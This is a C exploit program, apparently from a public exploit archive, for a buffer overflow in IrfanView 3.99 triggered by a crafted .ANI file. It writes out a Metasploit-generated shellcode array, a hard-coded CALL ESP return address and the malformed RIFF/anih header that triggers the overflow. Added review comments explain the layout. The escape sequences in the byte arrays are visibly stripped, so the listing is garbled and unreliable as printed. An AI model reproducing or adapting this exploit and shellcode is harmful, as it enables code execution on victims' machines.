# Title : IrfanView 3.99 (.ANI File) Local Buffer Overflow Exploit
# Published : 2007-04-02
# Author : Marsu
/***************************************************************************
* IrfanView 3.99 .ANI File Buffer Overflow *
* *
* *
* IrfanView is vulnerable to a buffer overflow when opening a crafted .ani *
* file. The overflow occurs while it is creating a snapshot of the file. *
* This exploit launches calc.exe. *
* *
* Tested against Win XP SP2 FR. *
* Have Fun! *
* *
* Coded and discovered by Marsu <Marsupilamipowa@hotmail.fr> *
* *
* Note: this has nothing in common with the LoadAniIcon Stack Overflow. *
***************************************************************************/
#include "stdio.h"
#include "stdlib.h"
/* win32_exec - EXITFUNC=process CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com */
/*
 * Payload that main() copies into the generated file after the address
 * word. Declared unsigned char[] but later handed to strlen(), which takes
 * char * (sign-mismatch warning) and stops at the first 0x00 byte, so the
 * copied length silently depends on the payload containing no NUL.
 *
 * NOTE(review): the literals below read "x29xc9..." rather than "\x29\xc9..."
 * - the backslash escapes appear to have been lost when this page was
 * extracted. As printed, the array holds plain ASCII text (three characters
 * per intended byte), not the 164-byte sequence the generator comment
 * describes, so sizeof/strlen of it are roughly three times that figure.
 * The 16-token-per-line layout (10 lines x 16 + 4 = 164) is consistent with
 * Size=164 above.
 */
unsigned char CalcShellcode[] =
"x29xc9x83xe9xddxd9xeexd9x74x24xf4x5bx81x73x13x26"
"x45x32xe3x83xebxfcxe2xf4xdaxadx76xe3x26x45xb9xa6"
"x1axcex4exe6x5ex44xddx68x69x5dxb9xbcx06x44xd9xaa"
"xadx71xb9xe2xc8x74xf2x7ax8axc1xf2x97x21x84xf8xee"
"x27x87xd9x17x1dx11x16xe7x53xa0xb9xbcx02x44xd9x85"
"xadx49x79x68x79x59x33x08xadx59xb9xe2xcdxccx6exc7"
"x22x86x03x23x42xcex72xd3xa3x85x4axefxadx05x3ex68"
"x56x59x9fx68x4ex4dxd9xeaxadxc5x82xe3x26x45xb9x8b"
"x1ax1ax03x15x46x13xbbx1bxa5x85x49xb3x4ex3bxeax01"
"x55x2dxaax1dxacx4bx65x1cxc1x26x53x8fx45x6bx57x9b"
"x43x45x32xe3";
/*
 * Leading bytes of the crafted .ani file (copied to the start of the output
 * buffer by main()). Read as the byte escapes they were evidently meant to
 * be, they decode to a RIFF container:
 *   "RIFF" <size 0x162a> "ACON"
 *   "LIST" <size 0x44> "INFO"
 *     "INAM" <size 0x0a> "Metronome\0"
 *     "IART" <size 0x26> "MarsupilamiPowa@hotmail.com March  07\0"
 *   "anih" <size 0x1024> followed by a single 0x24 byte
 * i.e. an "anih" chunk whose declared length (0x1024) is far larger than the
 * 0x24 (36) its first body byte advertises; everything after this header in
 * the output is the 'C' filler main() lays down. From a detection
 * standpoint, an anih chunk length that disagrees with the 36-byte
 * ANIHEADER size is the structural anomaly in this file.
 *
 * NOTE(review): as with CalcShellcode, the backslashes of the escape
 * sequences appear to be missing from this page, so sizeof(Ani_headers)-1
 * as compiled from this listing is the ASCII text length (three chars per
 * intended byte), not the 97 bytes the layout implies.
 */
unsigned char Ani_headers[] =
"x52x49x46x46x2ax16x00x00x41x43x4fx4ex4cx49x53x54"
"x44x00x00x00x49x4ex46x4fx49x4ex41x4dx0ax00x00x00"
"x4dx65x74x72x6fx6ex6fx6dx65x00x49x41x52x54x26x00"
"x00x00x4dx61x72x73x75x70x69x6cx61x6dx69x50x6fx77"
"x61x40x68x6fx74x6dx61x69x6cx2ex63x6fx6dx20x4dx61"
"x72x63x68x20x20x30x37x00x61x6ex69x68x24x10x00x00"
"x24";
/*
 * Entry point: writes a fixed 1000-byte buffer to the path given as argv[1].
 *
 * Layout of the buffer, all offsets fixed at compile time: the Ani_headers
 * bytes, then 'C' filler, a 4-byte hard-coded address 459 bytes past the
 * headers, the CalcShellcode bytes 7 bytes after that, and one 0x00 byte
 * placed 10 bytes past the end of the payload. No offset is checked against
 * the 1000-byte buffer; the arithmetic only stays in range if the two
 * arrays have the byte sizes their comments claim (see the NOTE on each).
 *
 * Returns 0 in all cases, including the usage path.
 *
 * Review notes (code left as-is):
 *  - memset/memcpy/strlen are used without #include <string.h>; this relies
 *    on an implicit declaration, which C99 and later reject.
 *  - fopen() is not checked: an unwritable path gives a NULL FILE* that is
 *    then passed to fwrite()/fclose().
 *  - fwrite()/fclose() return values are ignored, so a short or failed write
 *    still reports "Done".
 *  - strlen(CalcShellcode) passes unsigned char[] where char* is expected
 *    and stops at the first NUL byte.
 *  - The format strings end in a bare "n"; this looks like "\n" with the
 *    backslash lost in extraction (the same loss seen in the byte arrays).
 */
int main(int argc, char* argv[])
{
FILE* anifile;
char evilbuff[1000]; /* whole output file; never bounds-checked below */
int ani_size;
printf("[+] IrfanView 3.99 .ANI File Buffer Overflown");
printf("[+] Coded and discovered by Marsu <Marsupilamipowa@hotmail.fr>n");
if (argc!=2) {
printf("[+] Usage: %s <file.ani>n",argv[0]);
return 0;
}
ani_size=sizeof(Ani_headers)-1; /* drop the literal's terminating NUL */
memset(evilbuff,'C',1000); /* filler that the oversized anih chunk reads into */
memcpy(evilbuff,Ani_headers,ani_size);
/* Bytes 8b 51 81 7c = little-endian 0x7c81518b. The address is tied to the
 * specific kernel32.dll build of the tested platform (Win XP SP2 FR per the
 * header comment) and has no validity elsewhere. */
memcpy(evilbuff+ani_size+459,"x8bx51x81x7c",4); /* CALL ESP in Kernel32.dll */
memcpy(evilbuff+ani_size+466,CalcShellcode,strlen(CalcShellcode)); /* see strlen note above */
memset(evilbuff+ani_size+466+strlen(CalcShellcode)+10,0,1); /* single NUL after the payload */
anifile=fopen(argv[1],"wb"); /* unchecked: NULL on failure */
fwrite( evilbuff, 1, sizeof(evilbuff), anifile ); /* writes all 1000 bytes; result ignored */
fclose(anifile);
printf("[+] Done. Have fun!n");
return 0;
}